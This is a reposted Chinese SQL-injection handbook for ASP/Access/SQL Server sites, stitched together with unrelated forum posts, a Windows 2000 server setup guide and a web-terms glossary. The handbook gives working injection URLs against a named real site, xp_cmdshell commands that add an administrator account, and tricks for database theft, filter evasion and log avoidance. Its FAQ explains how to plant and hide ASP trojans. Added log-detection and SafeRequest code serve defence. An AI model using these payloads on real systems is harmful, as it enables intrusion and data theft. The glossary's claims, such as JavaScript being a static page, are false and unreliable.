http://www.cnblogs.com/enif/archive/2004/08/11/32146.html (source site)
SQL Injection Handbook: ASP Injection Vulnerabilities in Full
Author: NB Alliance - Xiaozhu (QQ: 48814)
Preface
As B/S (browser/server) application development has spread, more and more programmers write applications in this model. Because the barrier to entry in this field is low, programmers' skill and experience vary widely, and a considerable share of them never check the legitimacy of user input when writing code, leaving their applications with security holes. A user can submit a piece of database query code and, from the results the program returns, obtain data he wants. This is the so-called SQL Injection.
SQL injection comes in through the normal WWW port and on the surface looks no different from ordinary web page access, so today's firewalls raise no alert for it. If the administrator is not in the habit of reviewing the IIS logs, an intrusion may go unnoticed for a long time.
The technique of SQL injection is quite flexible, though, and many unexpected situations arise during an injection. Whether you can analyse the specific situation and construct a clever SQL statement that successfully retrieves the data you want is the fundamental difference between a master and a "rookie".
Given the domestic situation, more than 70% of Chinese websites use ASP with Access or SQL Server, PHP with MySQL accounts for 20%, and everything else is under 10%. This article explains ASP injection methods and techniques from entry level through advanced; PHP injection is covered in a separate article by Zwell, another member of the NB Alliance. I hope it is useful to security workers and programmers alike. Readers who already know ASP injection: please do not skip the entry section, because some people have misunderstandings about the basic method of judging whether injection is possible. Are you ready? Let's go...
Entry Level
If you have never tried SQL injection, the first step is to turn off "Show friendly HTTP error messages" (IE menu => Tools => Internet Options => Advanced). Otherwise, whatever the server returns, IE only shows "HTTP 500 server error" and you get no further information.
Section 1: The principle of SQL injection
We start from the website www.19cn.com (note: the site's webmaster consented before this article was published, and most of the data is real).
The home page has a link titled "IE can't open a new window" whose address is http://www.19cn.com/showdetail.asp?id=49. If we append a single quote (') to this address, the server returns the following error:
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'ID=49''.
/showdetail.asp, line 8
From this error we can tell the following:
1. The site uses an Access database and connects through the JET engine rather than ODBC.
2. The program does not check whether the data submitted by the client meets its requirements.
3. The SQL statement queries on a field named ID.
From this example we can see that the principle of SQL injection is to submit specially crafted code from the client, collect the program's and server's responses, and so obtain the information we want.
Section 2: Determining whether SQL injection is possible
After reading Section 1, some will think: I test for injection with a single quote all the time; isn't it that simple?
In fact this is not the best method. Why?
First, not every server's IIS returns error messages to the client. If the program converts the parameter with something like cint(), SQL injection will not succeed, but the server still reports an error, with the message: "An error occurred on the server when processing the URL. Please contact the system administrator."
Second, some programmers with a little knowledge of SQL injection believe that filtering out the single quote makes them safe. This is not rare, and if you test with a single quote you will not find the injection point.
So which test is more accurate? The answer:
1. http://www.19cn.com/showdetail.asp?id=49
2. http://www.19cn.com/showdetail.asp?id=49 and 1=1
3. http://www.19cn.com/showdetail.asp?id=49 and 1=2
This is the classic 1=1, 1=2 test. How do we judge? Look at what the three URLs return.
If injection is possible:
1. Displays normally (this must be so, otherwise something is wrong).
2. Displays normally, with essentially the same content as 1.
3. Shows a BOF or EOF error (when the program does no checking), or "record not found" (when it checks rs.eof), or an empty page (when the program has On Error Resume Next).
If injection is not possible it is easier to tell: 1 also displays normally, while 2 and 3 usually return an error message defined by the program, or a message about a type error.
Of course, this is only the test for numeric parameters. In practice there are also character-type and search-type parameters, which I analyse in "General steps of SQL injection" in the intermediate section.
Section 3: Determining the database type and the injection method
Different databases have different functions, so the injection method differs too, and before injecting we must determine the database type. The databases most commonly paired with ASP are Access and SQL Server, which together account for more than 99% of sites online.
How do you make the program tell you which database it uses? Look:
SQL Server has some system variables. If the server's IIS error messages are not turned off and SQL Server returns the error, you can read the type straight from the error message, like this:
http://www.19cn.com/showdetail.asp?id=49 and user>0
This statement is simple, but it contains the essence of the SQL Server-specific injection method; I found this efficient technique by accident while testing. Its meaning: the front part of the statement is normal, and the key is "and user>0". As we know, user is a built-in SQL Server variable holding the name of the currently connected user, of type nvarchar. Comparing an nvarchar value with the integer 0 makes the system try to convert the nvarchar value to int, which of course fails, and SQL Server reports: "Syntax error converting the nvarchar value 'abc' to a column of data type int." Here abc is the value of the variable user, so the database user name is handed to us without effort. In later sections you will see many statements using this trick. Incidentally, it is well known that SQL Server's sa user has permissions equivalent to Administrators; getting sa almost certainly means getting the host's Administrator. The method above is also a convenient test of whether the site logs in as sa: if it does, the error says it cannot convert "dbo" to int, not "sa".
If the server's IIS does not return error messages, how do we determine the database type? We can distinguish Access from SQL Server by their differences: each has its own system tables. The table storing all objects in the database is [MSysObjects] in Access, which cannot be read in a web environment ("no permission"), and [sysobjects] in SQL Server, which can be read normally in a web environment.
Where injection is possible, use these statements:
http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from sysobjects)>0
http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from msysobjects)>0
If the database is SQL Server, the first URL's page is roughly the same as the original page http://www.19cn.com/showdetail.asp?id=49, while the second URL errors because the table msysobjects is not found; even if the program has error handling, the page is completely different from the original.
If the database is Access, the situation is different: the first URL's page is completely different from the original, and the second depends on whether the database is set to allow reading the system table. Generally it is not allowed, so that page also differs completely from the original. In most cases the first URL alone reveals the database type; the second is only for confirmation when IIS error messages are on.
Intermediate Level
In the entry section we learned how to judge whether SQL injection is possible, but that is not enough to obtain a site's confidential content. Next we learn how to get the content we want from the database. First, the general steps of SQL injection:
Section 1: General steps of SQL injection
First, assess the environment, find the injection point and determine the database type, as described in the entry section. Second, based on the type of the injected parameter, reconstruct in your mind what the original SQL statement looks like. Parameters fall into three main types:
(A) ID=49. The injected parameter is numeric and the SQL statement roughly looks like: select * from tablename where field=49. The injected parameter is ID=49 and [condition], producing: select * from tablename where field=49 and [condition]
(B) Class=series. The injected parameter is a character string and the SQL statement roughly looks like: select * from tablename where field='series'. The injected parameter is Class=series' and [condition] and ''=', producing: select * from tablename where field='series' and [condition] and ''=''
(C) A search whose parameter is not filtered, e.g. keyword=keyword. The original SQL statement roughly looks like: select * from tablename where field like '%keyword%'. The injected parameter is keyword=' and [condition] and '%25'=', producing: select * from tablename where field like '%' and [condition] and '%'='%'
Next, substitute the condition into the SQL statement to guess the table name, for example:
ID=49 and (select count(*) from admin)>=0
If the page shows the same as for ID=49, the added condition holds, i.e. the table admin exists; otherwise it does not (please remember this method). Loop this until you guess the name.
Having guessed the table name, replace count(*) with count(fieldname) and guess the field name in the same way.
Some will say there is an element of luck here: if the name is very complex, you will get nowhere. Quite right. No hacker technique in this world succeeds 100% of the time; as the saying goes, flies do not bite an egg without a crack. However good the technique, hackers only get in because others' code is not strict or their passwords are not kept confidential.
One more thing: for SQL Server databases there is a way to make the program tell us the table and field names itself, which is introduced in the advanced section.
Finally, once the table name and column name are guessed, use SQL statements to obtain the field's value. The most common method is described below; although it is slow, it is a method that is certain to work.
For example, knowing the table admin has a field username, we first take the first record and test its length:
http://www.19cn.com/showdetail.asp?id=49 and (select top 1 len(username) from admin)>0
The rule: if the username length of the top 1 record is greater than 0, the condition holds; then test >1, >2, >3 and so on until the condition fails. For example, if >7 holds and >8 fails, then len(username)=8. Of course nobody will be stupid enough to test 0, 1, 2, 3 one by one; use your own judgement. After obtaining the length of username, use mid(username,N,1) to take the N-th character and asc(mid(username,N,1)) to get its ASCII code, for example:
ID=49 and (select top 1 asc(mid(username,1,1)) from admin)>0
Again, narrow down the ASCII code of the first character step by step. Note that letters and digits have ASCII codes between 1 and 128; use this to speed up the guessing. If you write a program to run the tests, efficiency improves enormously.
Section 2: Common SQL injection functions
People with a grounding in SQL have a much higher success rate at injection than those without. We must raise our SQL level, especially in some common functions and commands.
Access: asc(character) / SQL Server: unicode(character)
Purpose: returns the ASCII code of a character.
Access: chr(number) / SQL Server: nchar(number)
Purpose: the inverse of asc; returns the character for an ASCII code.
Access: mid(string,N,L) / SQL Server: substring(string,N,L)
Purpose: returns the substring of length L starting at the N-th character, i.e. the characters between N and N+L.
Access: abs(number) / SQL Server: abs(number)
Purpose: returns the absolute value of a number (used when guessing Chinese characters).
Access: A between B and C / SQL Server: A between B and C
Purpose: tests whether A lies between B and C.
Section 3: Handling Chinese characters
Meeting Chinese characters during injection is common, and some people give up as soon as they see them. In fact, once you understand Chinese encoding, "Chinese phobia" is quickly overcome.
First some common knowledge:
In Access, the "ASCII code" of a Chinese character may be negative; take its absolute value with abs(), and the character is unchanged after the sign is removed.
In SQL Server the code of a Chinese character is positive, but because it is a two-byte Unicode encoding the ascii() function cannot obtain it; you must use unicode() to return the code and nchar() to return the corresponding character.
Once you understand these two points, don't you think guessing Chinese is almost the same as English? Apart from the functions used, pay attention to the range; the method is otherwise the same.
Advanced Level
After reading the entry and intermediate sections, cracking an ordinary website is no problem. But what if you cannot guess the table name, or the author has filtered some special characters? How do you raise the injection success rate? How do you guess more efficiently? Read on in the advanced section.
Section 1: Injecting SQL Server databases using the system tables
SQL Server is a powerful database system closely tied to the operating system, which is a great convenience for developers but also gives an injector a springboard. Let's look at a few specific examples:
1. http://site/url.asp?id=1;exec master..xp_cmdshell "net user name password /add"--
In SQL Server the semicolon separates two statements and -- marks the rest as a comment, so this line is split into two statements: first select the record with id=1, then execute the stored procedure xp_cmdshell, which calls system commands, here the net command, to create a new Windows account named name with password password. Then:
2. http://site/url.asp?id=1;exec master..xp_cmdshell "net localgroup name administrators /add"--
adds the new account name to the administrators group. Without further ado, you have the highest permissions on the system! Of course, this only works when the database connection is made as sa; otherwise there is no permission to call xp_cmdshell.
3. http://site/url.asp?id=1 and db_name()>0
A counterpart of "and user>0", which obtained the connection user name. db_name() is another system variable, returning the name of the connected database.
4. http://site/url.asp?id=1;backup database dbname to disk='c:\inetpub\wwwroot\1.db';--
This is quite a trick: with the database name from 3 and the absolute path exposed by some IIS error, back the database up into the web directory and download the whole thing over HTTP, and every administrator and user password is laid bare! When the absolute path is unknown you can also back up to a network address (e.g. \\202.96.xx.xx\share\1.db), but the success rate is not high.
5. http://site/url.asp?id=1 and (select top 1 name from sysobjects where xtype='u' and status>0)>0
As mentioned, sysobjects is the SQL Server system table holding all tables, views, constraints and other objects; xtype='u' and status>0 selects user-created tables. The statement above takes the first table name and compares it with 0, so that the error message exposes the table name. How to get the second and third table names is left to our clever readers.
6. http://site/url.asp?id=1 and (select top 1 col_name(object_id('name'),1) from sysobjects)>0
With the table name from 5, object_id('name') gets the table's internal ID and col_name(ID,1) returns the table's first field name; change 1 to 2, 3, 4 ... to obtain the field names one by one.
The six points above are the distilled result of my study of SQL Server injection; you can see that the depth of your understanding of SQL Server directly affects the success rate and guessing speed. Studying SQL Server injection also improved my development skills considerably; perhaps security and development really do complement each other.
Section 2: Bypassing program restrictions to continue injecting
In the entry section we saw that many people test for injection with the single quote, so many people also filter the quote to "prevent" injection. This may block some entry-level attempts, but someone familiar with SQL injection can still use the relevant functions to get round the program.
In "General steps of SQL injection" the statements I used were already optimised to contain no single quote; in "Injecting SQL Server databases using the system tables" some statements do contain one. Let's take an example of how to transform them:
Simple: for where xtype='u', the ASCII code of u is 85, so where xtype=char(85) can be used instead; if the characters are Chinese, e.g. where name='用户' ('user'), use where name=nchar(29992)+nchar(25143) instead.
Section 3: Summary of experience
1. Some people filter keywords such as select, update and delete but forget about case, so try SELECT.
2. When you cannot guess a field name, look at the login form on the site; field names are usually the same as the form's field names.
3. Special note: a + in the address bar is interpreted as a space, %2B as +, and %25 as %; see URL encoding for details.
4. When injecting with GET, IIS records every string you submit; it does not record POST bodies, so where a URL accepts POST, use POST rather than GET.
5. The entry section used the ASCII character-by-character decoding method; SQL Server can use it too, as long as you allow for the differences between the two databases. But if the error message can be made to expose the value, efficiency and accuracy improve greatly.
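An added Python example, not from the article or from NBSI, that turns note 4 around for the defender: it parses IIS W3C log lines and flags the probe shapes this article describes (and 1=1 / 1=2, and user>0, sysobjects, stacked xp_cmdshell statements, char()/nchar() rewrites), undoing the +, %2B and %25 encodings from note 3 first. The log excerpt, IP addresses and rule names are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C extended log excerpt (sample data, not from the article's site).
# The query strings are the article's own probe shapes, URL-encoded as a browser sends them.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-08-11 10:00:01 192.0.2.10 GET /showdetail.asp id=49 200
2004-08-11 10:00:05 192.0.2.10 GET /showdetail.asp id=49+and+1%3D1 200
2004-08-11 10:00:09 192.0.2.10 GET /showdetail.asp id=49+and+1%3D2 500
2004-08-11 10:00:15 192.0.2.10 GET /showdetail.asp id=49+and+user%3E0 500
2004-08-11 10:00:22 192.0.2.10 GET /showdetail.asp id=49+and+(select+count(*)+from+sysobjects)%3E0 200
2004-08-11 10:00:40 192.0.2.10 GET /url.asp id=1;exec+master..xp_cmdshell+%27dir%27-- 200
2004-08-11 10:01:00 198.51.100.7 GET /showdetail.asp id=50 200
"""

# Detection rules, one per technique the article walks through.  Each regex is
# applied to the decoded, lower-cased, whitespace-collapsed query string.
RULES = [
    ("boolean-probe", re.compile(r"\band\s+\d+\s*=\s*\d+")),              # and 1=1 / and 1=2
    ("sqlserver-fingerprint", re.compile(r"\band\s+(user|db_name\s*\(\s*\))\s*>\s*0")),
    ("system-table", re.compile(r"\b(m?sysobjects|col_name|object_id)\b")),
    ("stacked-or-comment", re.compile(r";|--")),                           # ;exec ... --
    ("dangerous-proc", re.compile(r"\b(xp_cmdshell|backup\s+database)\b")),
    ("char-evasion", re.compile(r"\bn?char\s*\(\s*\d+\s*\)")),             # char(85), nchar(29992)
    ("length-or-char-probe", re.compile(r"\b(len|asc|mid|substring|unicode)\s*\(")),
]


def parse_w3c(log_text):
    """Yield one dict per request line, using the #Fields: directive for column names."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            yield dict(zip(fields, line.split(" ")))


def normalize_query(raw):
    """Undo the encodings note 3 describes ('+' -> space, %2B -> '+', %25 -> '%'),
    then collapse whitespace and lower-case so the rules see one canonical form."""
    decoded = unquote_plus(raw)
    return re.sub(r"\s+", " ", decoded).strip().lower()


def scan_entry(entry):
    """Return the names of all rules that match this request's query string."""
    query = normalize_query(entry.get("cs-uri-query", ""))
    return [name for name, rx in RULES if rx.search(query)]


def scan_log(log_text):
    """Return a finding for every request that trips at least one rule."""
    findings = []
    for entry in parse_w3c(log_text):
        rules = scan_entry(entry)
        if rules:
            findings.append({
                "time": entry["time"],
                "client": entry["c-ip"],
                "uri": entry["cs-uri-stem"],
                "query": normalize_query(entry["cs-uri-query"]),
                "rules": rules,
            })
    return findings


def probing_clients(findings, threshold=2):
    """Clients with at least `threshold` flagged requests; the 1=1 / 1=2 pair alone is enough."""
    counts = {}
    for f in findings:
        counts[f["client"]] = counts.get(f["client"], 0) + 1
    return {ip for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["client"], f["uri"], f["rules"], f["query"])
    print("probing clients:", probing_clients(scan_log(SAMPLE_LOG)))
```

As note 4 says, only GET query strings appear in these logs; POST bodies need application-level logging to be checked the same way.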
Defense
SQL injection vulnerabilities are a case of "a thousand-mile dyke breached by an ant hole": extremely common online, usually because the programmer does not understand injection, the code is not strict, or one parameter was forgotten. Here I give you a function to use in place of ASP's Request function; with it you can say NO to all SQL injection. The function:

```vbscript
Function SafeRequest(ParaName, ParaType)
  ' --- incoming parameters ---
  ' ParaName: parameter name (string)
  ' ParaType: parameter type (numeric: 1 means the parameter is a number, 0 means it is a string)
  Dim ParaValue
  ParaValue = Request(ParaName)
  If ParaType = 1 Then
    If Not IsNumeric(ParaValue) Then
      Response.Write "Parameter " & ParaName & " must be numeric!"
      Response.End
    End If
  Else
    ' double every single quote so it cannot close the string literal
    ParaValue = Replace(ParaValue, "'", "''")
  End If
  SafeRequest = ParaValue
End Function
```

The article ends here. Whether you are security staff, a technical enthusiast or a programmer, I hope it helps you. If you have questions or want to discuss related topics, you are welcome at www.54nb.com. Thank you!
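An added Python example, not the article's own code: it reproduces the three parameter shapes (A), (B) and (C) from the intermediate section against a constructed SQLite table, shows that the 1=1 / 1=2 probes behave exactly as the entry section describes, then applies a port of the SafeRequest checks and, as the stronger fix, bound parameters. The table, rows and function names are made up, and sqlite3 stands in for Access/SQL Server.

```python
import re
import sqlite3


# Constructed in-memory table standing in for the site's news table (sample data).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER, title TEXT, class TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?, ?)", [
        (49, "IE cannot open a new window", "tips"),
        (50, "Another article", "news"),
    ])
    return con


# Shape (A): the numeric parameter is spliced straight into the SQL text.
def vulnerable_by_id(con, raw_id):
    return con.execute("SELECT id FROM news WHERE id = " + raw_id).fetchall()


# Shape (B): the string parameter is spliced between single quotes.
def vulnerable_by_class(con, raw_class):
    sql = "SELECT id FROM news WHERE class = '" + raw_class + "'"
    return con.execute(sql).fetchall()


# Shape (C): the search parameter is spliced into a LIKE pattern.
def vulnerable_search(con, raw_kw):
    sql = "SELECT id FROM news WHERE title LIKE '%" + raw_kw + "%'"
    return con.execute(sql).fetchall()


NUMERIC = re.compile(r"^\s*[+-]?\d+\s*$")


def safe_request(value, para_type):
    """Port of the article's SafeRequest: para_type 1 = numeric, 0 = character.
    The numeric test is deliberately stricter than VBScript's IsNumeric, which also
    accepts exponent and hex (&H..) forms that are not safe to splice into SQL."""
    if para_type == 1:
        if not NUMERIC.match(value):
            raise ValueError("parameter must be numeric")
        return value.strip()
    # Character branch: doubling the quote keeps it inside the string literal.
    return value.replace("'", "''")


def filtered_by_id(con, raw_id):
    return vulnerable_by_id(con, safe_request(raw_id, 1))


def filtered_by_class(con, raw_class):
    return vulnerable_by_class(con, safe_request(raw_class, 0))


def filtered_search(con, raw_kw):
    return vulnerable_search(con, safe_request(raw_kw, 0))


# The stronger fix: bind the value as a parameter so it never becomes SQL text.
def parameterized_by_id(con, raw_id):
    return con.execute("SELECT id FROM news WHERE id = ?", (int(raw_id),)).fetchall()


def parameterized_by_class(con, raw_class):
    return con.execute("SELECT id FROM news WHERE class = ?", (raw_class,)).fetchall()


def parameterized_search(con, raw_kw):
    return con.execute("SELECT id FROM news WHERE title LIKE ?", ("%" + raw_kw + "%",)).fetchall()


def rejected(fn, *args):
    """True if fn raises ValueError for args; shows which inputs the checks stop."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    con = make_db()
    print("1=1 probe:", vulnerable_by_id(con, "49 and 1=1"))   # same rows as id=49
    print("1=2 probe:", vulnerable_by_id(con, "49 and 1=2"))   # empty: injectable
    print("filtered :", rejected(filtered_by_id, con, "49 and 1=1"))
```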
---------------------------------------------------------------
Description: use NBSI, the NB Alliance SQL injection analyzer, to detect all kinds of SQL injection vulnerabilities and decode values, improving the efficiency of guessing. Copyright: this article is my original series, first published at www.54nb.com; reproduction is welcome, but please keep the copyright notice, and media and magazines please contact me before reprinting.
---------------------------------------------------------------
FAQ for this version, and must-read for newcomers; new friends please read
1. NBSI is not a panacea; don't expect it to guess 100% of sites. Manual guessing does not succeed everywhere either. When NBSI cannot guess a site, that does not mean it cannot be guessed; your injection skill just is not there yet.
2. Don't treat this as a place to find websites to hack. If you have questions while trying things, raise them with attention to detail; injection is a technique that requires judging many environmental factors.
3. Don't post a URL and expect others to teach you from start to finish, and don't ask the forum to answer questions that cannot be answered in a few lines, such as "how do I get the website" or "how do I get a webshell"; I will delete them directly.
4. Don't send me private messages asking me to help you; that is impossible, so don't waste each other's time.
5. Don't post "UP" or "Top" replies; if you think an article is well written, say what you found good, not just a bump.
6. Read the following common questions before posting, to avoid embarrassment:
(1) Q: What is SQL injection? A: http://nb.unionbyte.com/view.asp?postid=1457033
(2) Q: Can this be injected: Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' (or Type mismatch: 'cint')? A: The parameter has been filtered; although not very friendly, it cannot be injected.
(3) Q: After getting the website's backend admin privileges, is there a way to get a trojan onto the site? A: Find something that allows uploads and upload an ASP trojan. With SQL Server you must get an absolute path, then generate it with tools such as NBWS.
(4) Q: How do I break this MD5 (e.g. AB2A34FDF3FD232)? A: At present MD5 can only be brute-forced; don't ask others to break it for you. Download a tool and do it yourself. Tool here: http://nb.unionby.com/view.asp?postid=1457924
(5) Q: How to prevent SQL injection? A: Prevent it for numeric, character and search parameters. For details see Xiaozhu's SafeRequest function in the Defense section of the article above.
(6) Q: How do I keep the trojan hidden after uploading it? A: Think from the administrator's point of view: write it into a document he does not use; rarely viewed files are often the safest. Or write a one-line trojan: <% if Request("x")>"" "" "" x")%>
(7) Q: I got the Unicode code of a character, but don't know how to turn it back into a character. A: SQL Server's nchar or VB's ChrW can restore it.
(8) Q: I downloaded the database but can't find the backend. A: There is no shortcut to finding the backend; keep looking, or try another way.
_________________________________________________
Dvbbs 7.0, Win2003 and configuration problems. Author: Unknown. Source: Unknown. Added: 2004-6-21. The forum could not be opened for a while, even though other web pages were fine, and each time IIS had to be restarted before it could be accessed again.
Thanks to XFXP for telling me the following; these are his answers, and after changing the configuration as described the problem was resolved.
RE: Is there a conflict between 7.0 and IIS? I turned off the RPC error in 2003 and the IIS error debugging and everything is completely normal now; it is as good as 2000. There is also the remote connection to the SQL database: if it is not needed, turn it off, as it sometimes causes RPC errors.
RE: Is there a conflict between 7.0 and IIS? In Services, Remote Procedure Call (RPC): the default on failure is to restart; change it to take no action.
Another one is IIS 5.0 error debugging; turn it off.
In addition, it is best to install a Java virtual machine; Win2003 does not ship with one.
RE: Is there a conflict between 7.0 and IIS?
Configure IIS to IIS 5.0 isolation mode:
In IIS Manager, expand the local computer, right-click "Web Sites", then click Properties.
Click the Service tab, select the "Run WWW service in IIS 5.0 isolation mode" check box, then click OK.
Under ______________________________________________________win2K configuration asp cgi php mysql Raiders Author: Unknown Source: Unknown Joined: 2004-6-21
InDexing Service, FrontPage 2000 Server Extensions, Internet Service Manager (HTML), there are some other, in short, unloaded. (According to safety principles, least service minimum permissions = maximum security.)
First, open the Internet Manager (Start -> Program -> Management -> Internet Service Management) If you installed on the top, there is a default site and a SMTP service item to select the default site, remove all the following table of Contents. (Press the DELETE button on your keyboard) to stop IIS, the simplest method: Start -> Run -> Enter net stop iisadmin Select Y Enter (started commands: NET Start W3SVC) Put the C disk INETPUB The directory completely deletes (after stopping IIS can be deleted), in other discs, create a directory in IIS Manager to point the main directory of the default site to the new directory, if you need any permissions, you can build it, what need? What is the right to open? (Special paying attention to writing permissions and executing programs, there is no absolute need to be given, the default is not given, so you don't have to study, huh, huh ..)
Application Configuration: Remove any useless mappings outside the IIS Manager, leave ASP, ASA, and other file types you really need to use, (except CGI, PHP, other, I think you are useless, delete HTW, htr, idq, ida ...) I don't know where to delete it? ? Method: Open Internet Service Management -> Select Site -> Properties -> WWW Service -> Edit -> Home> Configuration -> Application Mapping, then start one by one to delete it (without all the best, true trouble). The script error message will then be changed to send text in the application tutoring of that window (unless you want the ASP error, the user knows your program / network / database structure) error text written? Just like you like it, look at it. Don't forget to let the virtual directory inherit the properties you set when you click OK.
In order to deal with increasing CGI vulnerability scanner, there is a small tip that can be referred to in IIS, and the HTTP404 Object Not Found error page will be redirected to a custom HTM file via URL, which can make the most CGI vulnerability scanner fail. In fact, the reason is very simple. Most CGI scanners are written for convenience. By checking if the HTTP code returns to the page is existing, for example, the famous IDQ vulnerability is generally verified by taking 1.IDQ, if Returns to HTTP200, it is considered to have this vulnerability, and vice versa if it returns HTTP404, if you reform the HTTP404 error message to the http404.htm file via URL, all scans return HTTP200, 90% The CGI scanner will think that you have any vulnerabilities. The result is that your true vulnerability is covered, so that the invaders are nowhere to start, but from the perspective, I still think that it is triggered to do safety settings than such tips. More important.
Win2000 account security is another focus. First, Win2000's default installation allows any user to get all the account / sharing lists through empty users, this original is to facilitate local area network users to share files, but a remote user can get your user List and crack user passwords with violence. Many friends know that can ban 139 empty connections can be disabled by changing registry local_machine / system / currentcontrolset / control / lsa-restrictanonymous = 1, actually Win2000 local security policy (if it is domain server is in domain server security and domain security policies There is such options restrictanonymous (additional limit for anonymous connection), this option has three values: 0: None. Rely on default permissions (no, depending on the default permissions) 1: do not allow Enumeration of Sam Accounts and Shares Not allowed to enumerate SAM account and share) 2: No Access WITHOUT EXPLICIT Anonymous Permous Permouss (no explicit anonymous permission is not allowed) 0 This value is the system default, what limit is not, remote users can know all your machines Account, Group Information, Shared Directory, Network Transfer List (NetServertransportenum, etc.) This setting is very dangerous to the server. 1 This value is only non-null user access SAM account information and sharing information. 2 This value is in Win2000 It is supported by it. If you use this value, your sharing is all finished, so I recommend you to 1 is better. Ok, invaders have no way to get us now. User list, our account is safe ... slow, there is at least one account is a password, this is the system built-in Administrator, what should I do? I changed, in computer management -> User account Administrator then renamed, change what casters, as long as you can remember it. 
After changing the super management user name, you can also see it in the Terminal Service login interface (you log in, you have remember), modify the method: Run Regedit, find the Don't Display Last User Name string data in HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / WindowsNT / CURRENTVERSION / WINLOGON item, so that the system does not automatically display the last login user name.
For security, you can also open TCP / IP filter, right-click on the desk, right-click on the network -> Properties -> Right click on the NIC you want to configure -> Properties -> TCP / IP-> Advanced -> Options -> TCP / IP Filter Here there is three filters, which are: TCP ports, UDP ports, and IP protocol TCP ports, click "Allow", then add the port you need to open, in general, the web server only needs to open 80 (WWW) The FTP server needs to open 20 (FTP DATA), 21 (FTP Control), 3306 (Mysql), 3389 (remote terminal control, if your host hosts in other rooms, you can't do it directly, you need this) mail server may need Open 25 (SMTP), 110 (POP3), I have no research on the port, but if you provide this article, you only have to open a few. (80, 20, 21, 25, 3306, 3389) - CGI support
Download ActivePerl (you can download the latest version of www.perl.com)
1, decompression, run install.exe, default is installed under C: / Perl, but for convenience, please install it to the C: / usr directory, (so you can use it directly to write the PERL interpreter).! / USR / BIN / Perl can be consistent with the stand-alone environment and the network environment path. Press Y.) 2, after installing, follow these three steps to modify the registry: Run Reedit, search: hkey_local_machine / system / CurrentControlSet / Services / W3SVC / Parameters / ScriptMap / key name, then add key name: ". Cgi", key value: "c: /usr/bin/perl.exe% s" and key name: ". Pl" Key value: "c: /usr/bin/perl.exe% s" (do not know how to build? So: In the box ---> Right button ---> New -> string value name Change to .cgi, double-click the key to enter numerical data, which is the key value mentioned above), because the host is to support PHP, so it adds support here to PHP and PHP3 (in the new site, save time) Add key name ".php", key value: "C: / php/php.exe% S% S" Add key name ".php3", key value: "c: / php/php.exe% s% s" OK, take effect after restart! CGI supports! After the new site is created, the application configuration will be added to PHP and CGI support (not to delete this permission). CGI support!
-- MySQL support
Download MySQL (the latest version is available from www.mysql.com).
1. Unzip it and run setup.exe, choosing a full install; the default installation path is C:\mysql.
2. After the installation completes, click "Run" on the Start menu, enter the command c:\mysql\bin\mysqld-nt.exe --install and execute it.
3. Start -> Programs -> Administrative Tools -> Services -> find MySQL -> start it.
4. The MySQL installation is complete; restart Windows 2000.
5. Open C:\mysql\bin\winmysqladmin.exe. The first time you use it, it asks for an administrator name and password; set them, and after that a "traffic light" icon appears in the system tray (from then on it is loaded automatically when the system starts).
6. OK, MySQL support done!
-- PHP support
Download PHP (the latest version is available from www.php.com).
1. Unzip PHP 4.0.4 to C:\php.
2. Copy the php.ini-dist file from the PHP directory to the WinNT directory and rename it php.ini (this is the PHP configuration file; it works without changes, I didn't study it carefully).
3. Modify php.ini as needed. If you want to use the session feature, create a C:\tmp directory and set session.save_path in php.ini to the absolute path C:\tmp.
4. Copy the php4ts.dll file from the PHP directory to the WinNT\System32 directory.
5. Start "Internet Services Manager" (IIS) from Administrative Tools in the Control Panel.
6. Open the site properties; under the "ISAPI Filters" option add a new filter, use "php" as the filter name, and in the Executable column fill in php4isapi.dll with its path (C:\php\sapi\php4isapi.dll).
7. Under the "Documents" option enable the default document and add "index.php".
Dvbbs (Dongwang forum) 7.0 SP2 has a serious vulnerability, please take note! Author: unknown. Source: unknown. Added: 2004-5-19. Recently many domestic users have discovered a vulnerability in the Dvbbs forum; every webmaster please take note, follow the official Dvbbs site, and patch promptly. Current workaround: turn off the user upload function, and delete or rename the two files REG_UPLOAD.ASP and Upfile.asp under the forum directory. The vulnerability is highly harmful; webmasters should take it seriously and watch the official site closely. The official patch is out, please download the update: http://www.luntan.com.cn/soft/2386.htm
SQL Injection
Penetration
Some friends do not know much about web technology, and some terms are often confused. Here is a summary:
1. Java, JavaScript and JScript. First, these three are not necessarily related: they are completely different things, developed by different companies, with many differences between them. Java was created by Sun; JavaScript is a product developed by Sun and Netscape; JScript is Microsoft's implementation of the ECMA-262 language specification. What the three have in common is a syntax similar to C. JS is an abbreviation of JavaScript. JScript is used in ASP and runs on the server side; Java and JavaScript run on the client. Sun later launched JSP, which is based on the Java language and runs on the server. A page that runs on the server is a dynamic page, so JScript-based ASP and Java-based JSP are dynamic pages, while Java and JavaScript are static pages.
2. Static pages and dynamic pages. Whether the program runs on the server side is the key indicator. Programs, pages and components running on the server belong to dynamic pages, which return different pages to different clients at different times, such as ASP, PHP, JSP, ASP.NET, CGI and so on. Programs, pages, plug-ins and components running on the client are static pages, such as HTML pages, Flash, JavaScript, VBScript and so on; they never change.
3. VB and VBScript. Some friends call VBScript "VB", which is wrong. VB is the abbreviation of Visual Basic and is used for software development. VBScript is the abbreviation of Microsoft Visual Basic Scripting Edition and is used in client-side web pages or in server-side ASP pages (the ASP language is based on VBScript or JScript). What VB and VBScript have in common is the syntax; their functions are the same and both are developed by Microsoft. Usually VBScript is abbreviated to VBS. Unfortunately, some web viruses now use VBScript.
[Self-account] 11 years of a programmer's life
A programmer's life is tiring, and this is written just for fun.
